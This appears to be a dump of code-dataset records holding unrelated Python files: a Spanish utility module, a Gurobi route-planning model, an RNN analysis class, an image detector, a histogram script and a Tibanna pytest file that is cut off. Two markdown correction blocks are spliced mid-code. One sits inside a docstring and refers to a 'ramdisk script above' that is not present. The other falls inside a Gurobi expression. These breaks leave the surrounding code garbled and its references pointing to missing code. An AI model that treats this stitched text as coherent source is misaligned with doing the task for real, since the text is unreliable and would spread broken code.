self.err=False\n self.msgg=''\n\n def InputMsggErr(self,key=\"\", msgg=\"\"):\n \"\"\"Ingresa un mensaje ala variable ERROR\"\"\"\n self.err=True\n if key==None or key.strip()==\"\":\n self.msgg= msgg\n else:\n self.msgg = OuputMsgg(key)\n \n def OuputMsggErr(self):\n \"\"\"Muestra el mensaje ala variable ERROR\"\"\"\n if DEBUGAPP:\n print('ERROR:{}'.format(self.msgg))\n\n return 'ERROR:{}'.format(self.msgg)\n \n @staticmethod\n def MsggErr( key=\"\", msgg=\"\"):\n \"\"\"Ingresa un mensaje ala variable ERROR y devuelve una variable error instanciada\"\"\"\n ERR =ERROR()\n ERR.err = True\n if key == None or key.strip() == \"\":\n ERR.msgg = msgg\n else:\n ERR.msgg = OuputMsgg(key)\n \n return ERR\n\n\ndef DebugAdd(opc=False):\n \"\"\"Agrega el modo debug ala aplicacion\n true -> activar\n false -> desactivar\n \"\"\"\n global DEBUGAPP \n DEBUGAPP = opc\n \n\ndef PathDBInput(path):\n \"\"\"Ingresa el path de configuracion\"\"\"\n global DB_PATH \n DB_PATH = path\n\n\ndef PathDBOuput():\n \"\"\"Regresa el path de configuracion\"\"\"\n global DB_PATH\n return DB_PATH\n\n\n\n\ndef ParseConfig(PATH):\n \"\"\"Parsea las configuraciones de la base de datos\n return dict conexion:\n [DATABASE]\n Database = example\n Host = example\n Port = example\n User = example\n Pass = example\n \"\"\"\n dictconfig={\n 'Database':\"\",\n 'Host':\"\",\n 'Port':\"\",\n 'User':\"\",\n 'Pass':\"\",\n 'TipDB':\"\",\n }\n err =ERROR()\n err = _ExistF(PATH)\n if err.err:\n return err,None\n\n config = configparser.ConfigParser()\n config.sections()\n try:\n config.read(PATH)\n except:\n err.InputMsggErr('ERRPARSE')\n return err,None\n \n try:\n topsecret = config['DATABASE']\n dictconfig['Database'] = str(topsecret['Database'])\n dictconfig['Host'] = str(topsecret['Host'])\n dictconfig['Port'] = str(topsecret['Port'])\n dictconfig['User'] = str(topsecret['User'])\n dictconfig['Pass'] = str(topsecret['Pass'])\n dictconfig['TipDB'] = str(topsecret['TipDB'])\n return err, dictconfig\n except:\n err.InputMsggErr('ERRPARSE2')\n return err,None\n \n \n\n#archivos\ndef _ExistF(path):\n \"\"\"Verifica si existe el archivo\"\"\"\n if os.path.exists(path):\n return ERROR()\n else:\n return ERROR.MsggErr('NotParse')\n\n \n\ndef OutJson(data):\n \"\"\"Envia una data en json tranformandola primero en 
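`restart_to_hdd()` in the ramdisk script above creates fresh `kernel`/`initrd`/`cmdline` sub-elements and immediately removes them (twice over), so the elements already present in the domain XML are never stripped and the guest keeps direct-kernel booting. A corrected sketch that removes the existing children:

```python
import xml.etree.ElementTree as ET

def strip_direct_boot(xml_desc):
    """Return domain XML with kernel/initrd/cmdline removed from <os>."""
    xml = ET.fromstring(xml_desc)
    os_el = xml.find('os')
    for tag in ('kernel', 'initrd', 'cmdline'):
        el = os_el.find(tag)
        if el is not None:                 # remove only what actually exists
            os_el.remove(el)
    # encoding='unicode' returns str on Python 3; drop it on Python 2
    return ET.tostring(xml, encoding='unicode')
```

Capturing `domain.XMLDesc()` before `destroy()` is also safer: a transient domain ceases to exist once destroyed.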
diccionario\"\"\"\n\n try:\n dics=dict(data)\n out=json.dumps(data,ensure_ascii=False)\n return ERROR(),out\n except:\n return ERROR.MsggErr('ERRJSON'),None\n \n\ndef uniqid():\n \"\"\"Genera un secuencial unique\"\"\"\n from time import time\n return int(str(uuid4().int)[0:8])\n\n","sub_path":"DataPythonEtl/EtlPy/utl/utl.py","file_name":"utl.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"85050022","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 21 09:09:38 2019\n\n@author: lenovo\n\"\"\"\n\n#/usr/bin/python3\n# -*- coding: utf-8 -*-\n# author = chenzixuan\nimport math\nimport time\nimport matplotlib.pyplot as plt\nimport matplotlib as mat\nimport numpy as np\nimport pandas as pd\nfrom gurobipy import *\nfrom math import sin, asin, cos, radians, fabs, sqrt\nfrom scipy.optimize import leastsq\nfrom xlrd import *\n#workbook=open_workbook(\"sheet1.xlsx\")\n#worksheet=workbook.sheet_by_index(0)\n#data=[]\n#for i in range(2,worksheet.nrows): #循环打印每一行\n# data.append(np.array(worksheet.row_values(i)))\n\n#data=np.array(data)\nTHETA=20\nALPHA=[20,10]\nBETA=[15,20]\nEPSIL=0.001\nLENGTH=data.shape[0]\n\nw=[0.5,0.5,0.4]\nOptimal=[109342.28180310303,13.0,4.0]\n\nc=data[:,3]\nt=data[:,4]\nd=np.ones((LENGTH,LENGTH))\nfor i in range(0,LENGTH):\n for j in range(0,LENGTH):\n d[i,j]=np.sqrt((data[i,1]-data[j,1])**2+(data[i,2]-data[j,2])**2+(data[i,0]-data[j,0])**2)\n if(i==j):\n d[i,j]=float(10000000)\n\n\n#x->point\ndef xRoute(x1):\n last=np.array(x1)\n cons=last.reshape(LENGTH+4,LENGTH)[0:LENGTH,:]\n points_tuple=np.where(cons==1)\n points=[]\n pointsNum=len(points_tuple[0])\n for i in range(pointsNum):\n points.append([points_tuple[0][i],points_tuple[1][i]])\n for i in range(pointsNum-1):\n for j in range(1,pointsNum):\n if points[j][0]==points[i][1]:\n t=points[j]\n points[j]=points[i+1]\n points[i+1]=t\n return(points)\n\n#Search Circle\ndef Next_Point(Oi, Oj, vi, r):\n Oij=Oj-Oi\n Lij=np.linalg.norm(Oij)\n a=np.cross(vi,Oij)\n n=a/np.linalg.norm(a)\n psi=math.acos(np.inner(vi,Oij)/(np.linalg.norm(vi)*Lij))\n d_line=Lij-2*r*math.sin(psi)\n d_arc=2*r*psi\n d=d_line+d_arc\n vj=math.cos(2*psi)*vi+(1-math.cos(2*psi))*np.inner(vi,n)*n+math.sin(2*psi)*np.cross(n,vi)\n\n return (d,vj)\n\ndef For_ZX(traj, delta=EPSIL, alpha1=ALPHA[0], alpha2=ALPHA[1], beta1=BETA[0], beta2=BETA[1], theta=THETA, r=200):\n\n # 主函数\n # 返回值: True=可到达终点 False=炸\n\n traj=np.array(traj)\n nn=traj.shape[0]\n d=0\n V=0 #垂直\n L=0 #水平\n\n for n in range(0,nn):\n nOi=traj[n][0]\n nOj=traj[n][1]\n Oi=np.array([data[nOi,0],data[nOi,1],data[nOi,2]])\n Oj=np.array([data[nOj,0],data[nOj,1],data[nOj,2]])\n if n==0:\n v=Oj-Oi\n tmp_d=np.linalg.norm(v)\n else:\n res=Next_Point(Oi, Oj, v, r)\n tmp_d=res[0]\n v=res[1]\n d=d+tmp_d\n\n # Calibration check\n # 0:水平 1:垂直\n cal=data[nOj,3]\n V=V+tmp_d*delta\n L=L+tmp_d*delta\n\n if cal==0: #水平\n if (V<=beta1) and (L<=beta2):\n L=0\n elif cal==1: #垂直\n if (V<=alpha1) and (L<=alpha2):\n V=0\n\n if (V>theta) and (L>theta):\n return (False)\n\n return (True)\n\n# Define my callback function\ndef mycallback(model, where):\n if where == GRB.Callback.MIPSOL:\n # MIP solution callback\n# nodecnt = model.cbGet(GRB.Callback.MIPSOL_NODCNT)\n# obj = model.cbGet(GRB.Callback.MIPSOL_OBJ)\n# solcnt = model.cbGet(GRB.Callback.MIPSOL_SOLCNT)\n# x = model.cbGetSolution(model._vars)\n pos=[]\n for j in range(LENGTH):\n for k in range(LENGTH):\n if x[j,k].Xn==1:\n pos.append([j,k])\n\n for k in 
range(len(pos)-1):\n for j in range(1,len(pos)):\n if pos[j][0]==pos[k][1]:\n t=pos[j]\n pos[j]=pos[k+1]\n pos[k+1]=t\n# print(\"+++++\",For_ZX(pos))\n input(\"Warit!!!\")\n# if where == GRB.Callback.POLLING:\n# # Ignore polling callback\n# pass\n# elif where == GRB.Callback.PRESOLVE:\n# # Presolve callback\n# cdels = model.cbGet(GRB.Callback.PRE_COLDEL)\n# rdels = model.cbGet(GRB.Callback.PRE_ROWDEL)\n# if cdels or rdels:\n# print('%d columns and %d rows are removed' % (cdels, rdels))\n# elif where == GRB.Callback.SIMPLEX:\n# # Simplex callback\n# itcnt = model.cbGet(GRB.Callback.SPX_ITRCNT)\n# if itcnt - model._lastiter >= 100:\n# model._lastiter = itcnt\n# obj = model.cbGet(GRB.Callback.SPX_OBJVAL)\n# ispert = model.cbGet(GRB.Callback.SPX_ISPERT)\n# pinf = model.cbGet(GRB.Callback.SPX_PRIMINF)\n# dinf = model.cbGet(GRB.Callback.SPX_DUALINF)\n# if ispert == 0:\n# ch = ' '\n# elif ispert == 1:\n# ch = 'S'\n# else:\n# ch = 'P'\n# print('%d %g%s %g %g' % (int(itcnt), obj, ch, pinf, dinf))\n# elif where == GRB.Callback.MIP:\n # General MIP callback\n# nodecnt = model.cbGet(GRB.Callback.MIP_NODCNT)\n# objbst = model.cbGet(GRB.Callback.MIP_OBJBST)\n# objbnd = model.cbGet(GRB.Callback.MIP_OBJBND)\n# solcnt = model.cbGet(GRB.Callback.MIP_SOLCNT)\n# if nodecnt - model._lastnode >= 100:\n# model._lastnode = nodecnt\n# actnodes = model.cbGet(GRB.Callback.MIP_NODLFT)\n# itcnt = model.cbGet(GRB.Callback.MIP_ITRCNT)\n# cutcnt = model.cbGet(GRB.Callback.MIP_CUTCNT)\n# print('%d %d %d %g %g %d %d' % (nodecnt, actnodes, \\\n# itcnt, objbst, objbnd, solcnt, cutcnt))\n# if abs(objbst - objbnd) < 0.1 * (1.0 + abs(objbst)):\n# print('Stop early - 10% gap achieved')\n# model.terminate()\n# if nodecnt >= 10000 and solcnt:\n# print('Stop early - 10000 nodes explored')\n# model.terminate()\n# elif where == GRB.Callback.MIPNODE:\n# # MIP node callback\n# print('**** New node ****')\n# if model.cbGet(GRB.Callback.MIPNODE_STATUS) == GRB.Status.OPTIMAL:\n# x = model.cbGetNodeRel(model._vars)\n# model.cbSetSolution(model.getVars(), x)\n# elif where == GRB.Callback.BARRIER:\n# # Barrier callback\n# itcnt = model.cbGet(GRB.Callback.BARRIER_ITRCNT)\n# primobj = model.cbGet(GRB.Callback.BARRIER_PRIMOBJ)\n# dualobj = model.cbGet(GRB.Callback.BARRIER_DUALOBJ)\n# priminf = model.cbGet(GRB.Callback.BARRIER_PRIMINF)\n# dualinf = model.cbGet(GRB.Callback.BARRIER_DUALINF)\n# cmpl = model.cbGet(GRB.Callback.BARRIER_COMPL)\n# print('%d %g %g %g %g %g' % (itcnt, primobj, dualobj, \\\n# priminf, dualinf, cmpl))\n# elif where == GRB.Callback.MESSAGE:\n# # Message callback\n# msg = model.cbGet(GRB.Callback.MSG_STRING)\n# model._logfile.write(msg)\n else:\n pass\n\n#Model setup\nm=Model('MILP')\nx=m.addVars(LENGTH,LENGTH,vtype=GRB.BINARY,name='x')\nv=m.addVars(LENGTH,vtype=GRB.CONTINUOUS,name='v')\nv1=m.addVars(LENGTH,vtype=GRB.CONTINUOUS,name='v1')\nl=m.addVars(LENGTH,vtype=GRB.CONTINUOUS,name='l')\nl1=m.addVars(LENGTH,vtype=GRB.CONTINUOUS,name='l1')\nM=GRB.INFINITY\n\n# Objective\n#for i in range(0,LENGTH):\n# for j in range(0,LENGTH):\n# s=x[i,j]*d[i,j]\n#m.setObjective(s,GRB.MINIMIZE)\n\nobj1=quicksum(x[i,j]*d[i,j]/Optimal[0] for i in range(LENGTH) for j in range(LENGTH))\nobj2=quicksum(x[i,j]/Optimal[1] for i in range(LENGTH) for j in range(LENGTH))\nobj3=quicksum(x[i,j]/Optimal[2] for i in range(LENGTH) for j in 
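Inside a `GRB.Callback.MIPSOL` callback, incumbent values must be read with `model.cbGetSolution(...)`; the `.Xn` attribute used above is only valid after `optimize()` returns, when iterating the solution pool, and the `input("Warit!!!")` call stalls the solver. A sketch following Gurobi's standard pattern of stashing the variables on the model object:

```python
from gurobipy import GRB

def mycallback(model, where):
    if where == GRB.Callback.MIPSOL:
        vals = model.cbGetSolution(model._x)          # incumbent values
        pos = [(j, k) for (j, k) in model._x.keys()
               if vals[j, k] > 0.5]                   # tolerate float noise
        # order `pos` into a route and run the feasibility check here
```

Setting `m._x = x` before calling `m.optimize(mycallback)` makes the variables reachable inside the callback.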
range(LENGTH))\n\nm.setObjectiveN(obj1,index=0,weight=w[0],abstol=0.5,name='obj1')\nm.setObjectiveN(obj2,index=1,weight=w[1],abstol=0.5,name='obj2')\n#m.setObjectiveN(obj3,index=2,weight=w[2],abstol=0.5,name='obj3')\n#m.setObjective(obj1,GRB.MINIMIZE)\n\n# Parameter Settings\n#m.setParam(GRB.Param.LogFile,'MILP.log')\n#m.setParam(GRB.Param.MIPGap, 0.003)\nm.setParam(GRB.Param.Threads, 8)\nm.setParam(GRB.Param.TimeLimit, 3600)\nm.setParam(GRB.Param.PoolSearchMode,1) #0 Optimal 1 all 2 N\nm.setParam(GRB.Param.PoolSolutions,20) #N Search Number\n#m.setParam(GRB.Param.PoolGap, 80000) #N Search GAP\n# New V = V1 L=L1\nfor i in range(LENGTH):\n for j in range(LENGTH):\n m.addGenConstrIndicator(x[i, j], 1, v[j] == v1[i] + d[i, j] * EPSIL,name='vv1')\n m.addGenConstrIndicator(x[i, j], 1, l[j] == l1[i] + d[i, j] * EPSIL,name='ll1')\n\n#init and end Constrains\nm.addConstr(v[0]==0,name='initv')\nm.addConstr(l[0]==0,name='initl')\nm.addConstr(v1[0]==0,name='initv1')\nm.addConstr(l1[0]==0,name='initl1')\nm.addConstr(v[LENGTH-1]<=THETA,name='endv')\nm.addConstr(l[LENGTH-1]<=THETA,name='endl')\n\n#Network Settings Constrains\nfor i in range(LENGTH):\n if i==0:\n cons=1\n elif i==LENGTH-1:\n cons=-1\n else:\n cons=0\n xij=quicksum(x[i,j] for j in range(LENGTH))\n xji=quicksum(x[j,i] for j in range(LENGTH))\n m.addConstr(xij-xji==cons,name='network'+str(i))\n\n#Error Constrain\nfor j in range(1,LENGTH-1):\n if c[j]==0:\n for i in range(LENGTH-1):\n m.addGenConstrIndicator(x[i,j],1,l1[j]==0,name='calil10')\n m.addGenConstrIndicator(x[i,j],1,v1[j]==v[j],name='calivv1')\n m.addGenConstrIndicator(x[i,j],1,v[j]<=BETA[0],name='calialph0')\n m.addGenConstrIndicator(x[i,j],1,l[j]<=BETA[1],name='calialph1')\n elif c[j]==1:\n for i in range(LENGTH-1):\n m.addGenConstrIndicator(x[i,j],1,l1[j]==l[j],name='calill1')\n m.addGenConstrIndicator(x[i,j],1,v1[j]==0,name='caliv10')\n m.addGenConstrIndicator(x[i,j],1,v[j]<=ALPHA[0],name='calibeta10')\n m.addGenConstrIndicator(x[i,j],1,l[j]<=ALPHA[1],name='calibeta1')\n# Edge constrain\nm.addConstrs((x[i,j]*d[i,j]*EPSIL<=max(min(ALPHA),min(BETA)) for i in range(LENGTH) for j in range(LENGTH-1)), name='edgecons')\nm.addConstrs((x[i,LENGTH-1]*d[i,LENGTH-1]*EPSIL<=THETA for i in range(LENGTH)) , name='edgecons_1')\n\n\nm.update()\nm.write('milp.lp')\nm.optimize()\nm.objVal\n\nlast=np.array(m.x)\nother=last.reshape(LENGTH+4,LENGTH)[LENGTH:LENGTH+4,:]\ncons=last.reshape(LENGTH+4,LENGTH)[0:LENGTH,:]\npoints_tuple=np.where(cons==1)\npoints=[]\nind=[]\npointsNum=len(points_tuple[0])\nfor i in range(pointsNum):\n points.append([points_tuple[0][i],points_tuple[1][i]])\nfor i in range(pointsNum-1):\n for j in range(1,pointsNum):\n if points[j][0]==points[i][1]:\n t=points[j]\n points[j]=points[i+1]\n points[i+1]=t\nfor i in range(pointsNum):\n ind.append(points[i][1])\n#m.setParam(GRB.Param.SolutionNumber, 0)\n# m.SolCount\nPossible={\"Val\":[],\"Solution\":[]}\nfor i in range(m.SolCount):\n m.setParam(GRB.Param.SolutionNumber, i)\n pos=[]\n Possible[\"Val\"].append(m.PoolObjVal)\n for j in range(LENGTH):\n for k in range(LENGTH):\n if x[j,k].Xn==1:\n pos.append([j,k])\n\n for k in range(len(pos)-1):\n for j in range(1,len(pos)):\n if pos[j][0]==pos[k][1]:\n t=pos[j]\n pos[j]=pos[k+1]\n pos[k+1]=t\n Possible[\"Solution\"].append(pos)\n","sub_path":"CAV Control and Planning Algorithm/Solving_Algorithm/gurobi.py","file_name":"gurobi.py","file_ext":"py","file_size_in_byte":10879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} 
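The bubble-style pass that orders selected edges into a route appears three times in the record above (after `optimize()`, in the callback, and in the solution-pool loop) and is O(n²). A successor map does it in one linear walk:

```python
def order_edges(edges, start=0):
    """Order [[i, j], ...] arcs into a path beginning at `start`."""
    succ = dict(tuple(e) for e in edges)   # tail -> head for each arc
    route, node = [], start
    while node in succ:
        nxt = succ[node]
        route.append([node, nxt])
        node = nxt
    return route
```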
+{"seq_id":"393622047","text":"import DIClasses\nimport SampleHandler\nimport Utils\nimport ROOT\nimport numpy as np\nimport math\nimport PlotService\nfrom scipy.stats import pearsonr\nfrom scipy.stats import entropy\nfrom keras import backend as K\n\nclass RNNAnlaysis:\n\n def __init__(self,Model,DataSet):\n self.Model = Model\n self.DataSet = DataSet\n\n def PhyNNCompare(self, layer,LCompareVar):\n \"\"\"\n Comparesion of the neuron output in a given layer to variables that are build by using physics intuition\n layer: Which Layer should be used for the comparision?\n LCompareVar: List of Variables to which the neuron Output is compared\n \"\"\"\n ListSamples = DIClasses.Init(LCompareVar,Cuts=True)\n Sampler = SampleHandler.SampleHandler(ListSamples)\n Sampler.norm = False\n Sampler.SequenceLength = 0\n Sampler.Plots = False\n CompareData = Sampler.GetANNInput(verbose=0)\n CompareTrain, CompareTest = CompareData.GetInput(\"Even\")\n train, test = self.DataSet.GetInput(\"Even\")\n\n input1 = self.Model.input # input placeholder\n output1 = [l.output for l in self.Model.layers] # all layer outputs\n fun = K.function([input1, K.learning_phase()],output1) # evaluation function\n LayerOutput = fun([train.Events, 1.])\n Layer = LayerOutput[layer-4]\n for i in range(Layer.shape[1]):\n for j in range(CompareTrain.Events.shape[1]):\n NeuronOutput = DIClasses.DISample(Utils.Transform(Layer[:,i],'MinMax'),CompareTrain.Weights,None,CompareTrain.OutTrue,None,None)\n CompareVar = DIClasses.DISample(Utils.Transform(CompareTrain.Events[:,j],'MinMax'),CompareTrain.Weights,None,CompareTrain.OutTrue,None,None)\n #PlotService.SigBkgHist(NeuronOutput,'Neuron ('+str(i)+') [a.u.]',40,0,1,tag='_Neuron_'+str(i))\n #PlotService.SigBkgHist(CompareVar, LCompareVar[j], 40,0,1,tag='LCompareVar'+str(j))\n Hist2D = PlotService.SigBkg2D(CompareVar,NeuronOutput,'Neuron ('+str(i)+') [a.u.]',LCompareVar[j],30,30,0,1,0,1)\n Utils.stdinfo(\"The mutual information of Neuron {0} and {1} is : {2}\".format(i,LCompareVar[j],self.GetNormedMi(Hist2D)))\n\n def GetNormedMi(self,Hist2D):\n \"\"\"\n Compute the mutual information (normed to the entropy of X and Y) from a 2D histogramm\n \"\"\"\n for i in range(30):\n col = np.array([])\n for j in range(30):\n col = np.append(col,Hist2D.GetBinContent(i,j))\n if(i == 0):\n HistArr = col\n else:\n HistArr = np.c_[HistArr,col]\n pxy = HistArr / float(np.sum(HistArr)) #Convert to probability\n nztotal = pxy > 0\n px = np.sum(pxy, axis=1) #marginal for x over y\n py = np.sum(pxy, axis=0) #marginal for y over x\n pxpy = px[:, None] * py[None, :]\n nzcomb = pxpy > 0\n EntrX = entropy(px[px > 0])\n EntrY = entropy(py[py > 0])\n\n pxy = pxy[nztotal * nzcomb]\n pxpy = pxpy[nztotal * nzcomb]\n \n return 1/math.sqrt(EntrX* EntrY) * np.sum(pxy * np.log(pxy / pxpy))","sub_path":"srcRNN/RNNAnalysis.py","file_name":"RNNAnalysis.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"616500834","text":"import data_preprocess\r\nimport image_analyzer\r\nimport blocks_reader\r\n\r\nfrom PIL import Image\r\n\r\n\r\ndef detector(img_name):\r\n path = \"данные/\"\r\n print(\"Data preprocessing\")\r\n base_img = Image.open(path + img_name)\r\n nimg = data_preprocess.normalized_img(base_img)\r\n\r\n pattern = image_analyzer.create_pattern()\r\n metric = image_analyzer.TriangleMetric(pattern, 28)\r\n\r\n print(\"Analyzing image\")\r\n img = image_analyzer.ImageReader(nimg)\r\n img.find_triangles(metric, base_img)\r\n 
\r\n img.visualize_centroids(save_file=\"output/trimino_centers.png\")\r\n img.visualize_mask(save_file=\"output/trimino_mask.png\")\r\n \r\n print(\"Blocks detection\")\r\n reader = blocks_reader.BlocksReader(img)\r\n blocks_reader.format_output(img, reader)\r\n return reader\r\n\r\n\r\ns = str(input())\r\nreader = detector(s)","sub_path":"trimino_detection/detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"15854043","text":"import matplotlib\n\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os, sys\n\n# Analyse the distribution of utterance number in dataset\n\ndata_path = sys.argv[1]\n\nutterance_number = [np.load(os.path.join(data_path, f), mmap_mode='r').shape[0] for f in os.listdir(data_path)]\n\nbins = [0, 5, 10, 20, 50, 100, 500]\nhist, bin_edges = np.histogram(utterance_number, bins)\nfig, ax = plt.subplots()\n# Plot the histogram heights against integers on the x axis\nax.bar(range(len(hist)), hist, width=1)\n\n# Set the ticks to the middle of the bars\nax.set_xticks([0.5 + i for i, j in enumerate(hist)])\n\n# Set the xticklabels to a string that tells us what the bin edges were\nax.set_xticklabels(['{} - {}'.format(bins[i], bins[i + 1]) for i, j in enumerate(hist)])\n\n# plt.hist(utterance_number, bins=[0,5,10,20,50,100,500])\n# plt.ylabel('Number of speakers')\n# plt.xlabel('Number of utterance')\nplt.savefig('Distribution.png')\n","sub_path":"sre/dataset_analysing.py","file_name":"dataset_analysing.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"358196592","text":"from core.pony_utils import (\n Tibanna,\n WorkflowRunMetadata,\n ensure_list,\n Awsem,\n merge_source_experiments,\n ProcessedFileMetadata,\n FormatExtensionMap,\n get_extra_file_key,\n create_ffmeta_input_files_from_pony_input_file_list\n)\nimport pytest\nfrom conftest import valid_env\nfrom ..unicorn.test_utils import awsem_error_fun\nfrom core.utils import printlog\nimport mock\n\n\n@pytest.fixture\ndef ff_metadata():\n return {\n \"app_name\": \"md5\",\n \"_tibanna\": {\n \"env\": \"fourfront-webprod\",\n \"settings\": {\n \"url\": \"\",\n \"run_type\": \"md5\",\n \"run_name\": \"md5_4DNFIIE1QWPL.fastq.gz\",\n \"env\": \"fourfront-webprod\",\n \"run_id\": \"4DNFIIE1QWPL.fastq.gz\"\n }\n },\n \"ff_meta\": {\n \"run_platform\": \"AWSEM\",\n \"uuid\": \"71d4d068-1b17-4e99-8b59-cfc561266b45\",\n \"parameters\": [],\n \"workflow\": \"d3f25cd3-e726-4b3c-a022-48f844474b41\",\n \"title\": \"md5 run 2018-02-06 21:41:42.750987\",\n \"award\": \"1U01CA200059-01\",\n \"awsem_job_id\": \"\",\n \"awsem_app_name\": \"md5\",\n \"lab\": \"4dn-dcic-lab\",\n \"run_status\": \"started\",\n \"output_files\": [\n {\n \"type\": \"Output report file\",\n \"workflow_argument_name\": \"report\"\n }\n ],\n \"input_files\": [\n {\n \"ordinal\": 1,\n \"workflow_argument_name\": \"input_file\",\n \"value\": \"b4f6807c-6f93-4b7d-91ff-ff95e801165c\"\n }\n ]\n },\n \"push_error_to_end\": True\n }\n\n\n@pytest.fixture\ndef json_request():\n return {\n \"input_files\": [\n {\n \"bucket_name\": \"encoded-4dn-files\",\n \"object_key\": \"4DNFI067AFHV.fastq.gz\",\n \"uuid\": \"46e82a90-49e5-4c33-afab-9ec90d65cca1\",\n \"workflow_argument_name\": \"fastq1\"\n },\n {\n \"bucket_name\": \"encoded-4dn-files\",\n \"object_key\": \"4DNFI067AFHX.fastq.gz\",\n \"uuid\": 
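In `detector.py` above, `path = "данные/"` is a Russian folder name ("data/"); it is kept verbatim since it must match the on-disk directory. The utterance-distribution script that follows it computes `np.histogram` and then hand-places and hand-labels the bars; `plt.hist` accepts the same explicit bin edges directly, as in this sketch:

```python
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt

def plot_distribution(utterance_number, out='Distribution.png'):
    bins = [0, 5, 10, 20, 50, 100, 500]     # same edges as the record
    plt.hist(utterance_number, bins=bins)
    plt.xlabel('Number of utterances per speaker')
    plt.ylabel('Number of speakers')
    plt.savefig(out)
```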
\"46e82a90-49e5-4c33-afab-9ec90d65cca2\",\n \"workflow_argument_name\": \"fastq2\"\n },\n {\n \"bucket_name\": \"encoded-4dn-files\",\n \"object_key\": \"4DNFIZQZ39L9.bwaIndex.tgz\",\n \"uuid\": \"1f53df95-4cf3-41cc-971d-81bb16c486dd\",\n \"workflow_argument_name\": \"bwa_index\"\n }\n ],\n \"workflow_uuid\": \"02d636b9-d82d-4da9-950c-2ca994a0943e\",\n \"app_name\": \"hi-c-processing-parta\",\n \"parameters\": {\n \"nThreads\": 8,\n \"teststring\": \"test\",\n }\n }\n\n\n@pytest.fixture\ndef workflow_event_data():\n return {\"workflow\": {\"import_id_list\": [\"FHtnXozBk1C5Fyp2dRmSa2yhFCBBoEcN\"],\n \"app_name\": \"md5\",\n \"task_id\": \"\",\n \"task_input\": {\"app\": \"4dn-dcic/dev/md5\",\n \"project\": \"4dn-dcic/dev\",\n \"name\": \"md5\",\n \"inputs\": {\"input_file\": {\"class\": \"File\",\n \"name\": \"4DNFI7RAJFJ4.fasta.gz\",\n \"path\": \"5877fc32e4b0f31cb4bc37a1\"}}},\n \"volume_list\": [{\"id\": \"4dn-labor/4dn_s32588y8f6\", \"name\": \"4dn_s32588y8f6\"}],\n \"header\": {\"X-SBG-Auth-Token\": \"1234\", \"Content-type\": \"application/json\"},\n \"token\": \"1234\", \"export_report\": [], \"project_id\": \"4dn-dcic/dev\",\n \"export_id_list\": [], \"output_volume_id\": \"4dn-labor/4dn_s32588y8f7\"}}\n\n\ndef test_create_workflowrun_from_event_parameter(update_ffmeta_event_data_newmd5):\n meta = update_ffmeta_event_data_newmd5['ff_meta'].copy()\n meta['app_name'] = 'md5'\n ff_wfr = WorkflowRunMetadata(**meta)\n assert ff_wfr\n\n\ndef test_tibanna():\n data = {'env': 'fourfront-webdev',\n 'settings': {'1': '1'}}\n tibanna = Tibanna(**data)\n assert tibanna\n assert tibanna.as_dict() == data\n\n\ndef test_ensure_list():\n assert ensure_list(5) == [5]\n assert ensure_list('hello') == ['hello']\n assert ensure_list(['hello']) == ['hello']\n assert ensure_list({'a': 'b'}) == [{'a': 'b'}]\n\n\ndef test_create_awsem(update_ffmeta_event_data, tibanna_env):\n update_ffmeta_event_data.update(tibanna_env)\n awsem = Awsem(update_ffmeta_event_data)\n assert awsem.args\n assert awsem.config\n assert awsem.app_name\n assert awsem.output_s3\n assert awsem.output_files_meta\n\n\ndef test_get_output_files(update_ffmeta_event_data, tibanna_env):\n update_ffmeta_event_data.update(tibanna_env)\n awsem = Awsem(update_ffmeta_event_data)\n of = awsem.output_files()\n assert 1 == len(of)\n assert of[0].runner == awsem\n assert of[0].bucket == awsem.output_s3\n assert of[0].key == 'lalala/md5_report'\n assert of[0].argument_type == 'Output report file'\n\n\ndef test_get_input_files(update_ffmeta_event_data, tibanna_env):\n update_ffmeta_event_data.update(tibanna_env)\n awsem = Awsem(update_ffmeta_event_data)\n infiles = awsem.input_files()\n assert 1 == len(infiles)\n assert infiles[0].runner == awsem\n assert infiles[0].bucket == 'elasticbeanstalk-fourfront-webdev-files'\n assert infiles[0].key == 'f4864029-a8ad-4bb8-93e7-5108f462ccaa/4DNFIRSRJH45.fastq.gz'\n assert infiles[0].accession == '4DNFIRSRJH45'\n\n\ndef test_get_inputfile_accession(update_ffmeta_event_data, tibanna_env):\n update_ffmeta_event_data.update(tibanna_env)\n awsem = Awsem(update_ffmeta_event_data)\n assert awsem.get_file_accessions('input_file')[0] == '4DNFIRSRJH45'\n\n\ndef test_get_inputfile_format_if_extra(update_ffmeta_event_data_extra_md5, tibanna_env):\n update_ffmeta_event_data_extra_md5.update(tibanna_env)\n for wf_file in Awsem(update_ffmeta_event_data_extra_md5).output_files():\n assert wf_file.runner.get_format_if_extras('input_file')[0] == 'pairs_px2'\n\n\n@pytest.fixture()\ndef proc_file_in_webdev():\n return {'status': 
'released',\n 'uuid': 'f6d5ba22-aaf9-48e9-8df4-bc5c131c96af',\n 'file_format': 'normvector_juicerformat',\n 'accession': '4DNFIRO3UX7I',\n 'award': '/awards/1U01CA200059-01/',\n 'lab': '/labs/4dn-dcic-lab/'}\n\n\ndef test_create_ProcessedFileMetadata_from_get_error_if_no_at_type(ff_keys, proc_file_in_webdev):\n # can use acc, uuid, @id, any valid url\n with mock.patch('core.pony_utils.get_metadata', return_value=proc_file_in_webdev):\n with pytest.raises(Exception) as expinfo:\n ProcessedFileMetadata.get(proc_file_in_webdev['accession'], ff_keys)\n assert \"only load ProcessedFiles\" in str(expinfo.value)\n\n\ndef test_create_ProcessedFileMetadata_from_get(ff_keys, proc_file_in_webdev):\n # can use acc, uuid, @id, any valid url\n file_with_type = proc_file_in_webdev.copy()\n file_with_type['@type'] = ['FileProcessed', 'Item', 'whatever']\n with mock.patch('core.pony_utils.get_metadata', return_value=file_with_type) as ff:\n pf = ProcessedFileMetadata.get(proc_file_in_webdev['accession'], ff_keys)\n assert 